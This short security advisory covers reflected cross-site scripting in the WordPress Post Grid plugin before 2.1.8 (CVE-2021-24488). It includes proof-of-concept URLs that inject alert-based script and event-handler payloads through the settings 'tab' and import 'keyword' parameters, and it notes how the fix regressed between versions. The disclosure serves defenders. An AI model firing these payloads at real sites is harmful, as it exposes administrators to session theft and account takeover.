Post Grid < 2.1.8 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24488

Description

The slider import search feature and tab parameter of the plugin settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script>
https://example.com/wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//

v 2.1.4 partially fixed the issue, still allowing arbitrary attributes to be injected, ie
https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="+accesskey=X+onclick=alert(1)//

v2.1.5 removed a lot of escaping done in 2.1.4, and was put back in v2.1.8